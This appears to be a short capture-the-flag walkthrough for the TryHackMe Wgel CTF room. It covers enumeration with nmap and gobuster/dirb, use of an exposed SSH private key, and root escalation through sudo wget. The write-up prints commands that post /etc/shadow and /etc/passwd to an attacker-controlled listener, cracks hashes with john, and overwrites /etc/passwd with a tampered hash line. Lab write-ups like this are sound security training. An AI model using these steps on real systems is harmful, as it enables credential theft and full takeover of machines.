Wgel CTF

Room Link: https://tryhackme.com/room/wgelctf

Scanning

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

No other ports found.

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

On the main page of the site it was just a apache default page but in the source we can see someone named jessie making a comment.

Ran gobuster and found a site under sitemap, nothing really interesting about it when browsing.

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt 

gobuster wasn't really able to find anything interesting.

Kali

gobuster dir -u http://$VICTIM/sitemap/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt 

Ran dirb with defaults and it found a .ssh folder which has a id_rsa so I downloaded and used it.

Kali

dirb http://$VICTIM/sitemap/

Kali

chmod 600 id_rsa
ssh -v -i id_rsa  jessie@$VICTIM

Victim

sudo -l

I tried cracking jessies hash as I would then be able to run any command with sudo but I couldn't crack it, documenting it anyways.

Victim

sudo -u root /usr/bin/wget --post-file=/etc/shadow $KALI:4444
sudo -u root /usr/bin/wget --post-file=/etc/passwd $KALI:4444

Victim

nc -lvnp 4444

Victim

unshadow passwd.txt shadow.txt > unshadowed.txt
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

Instead I changed the passwd file, I first downloaded to kali and changed the line for jessie so their password is now '123'. Then I uploaded it back and just became root.

Victim

sudo -u root /usr/bin/wget --post-file=/etc/passwd 10.10.65.21:4444

Kali

nc -lvnp 4444

Line to change

jessie:$1$new$p7ptkEKU1HnaHpRtzNizS1:1000:1000:jessie,,,:/home/jessie:/bin/bash

Kali

python2 -m SimpleHTTPServer 81

Victim

sudo wget http://$KALI:8/passwd -O /etc/passwd
sudo -i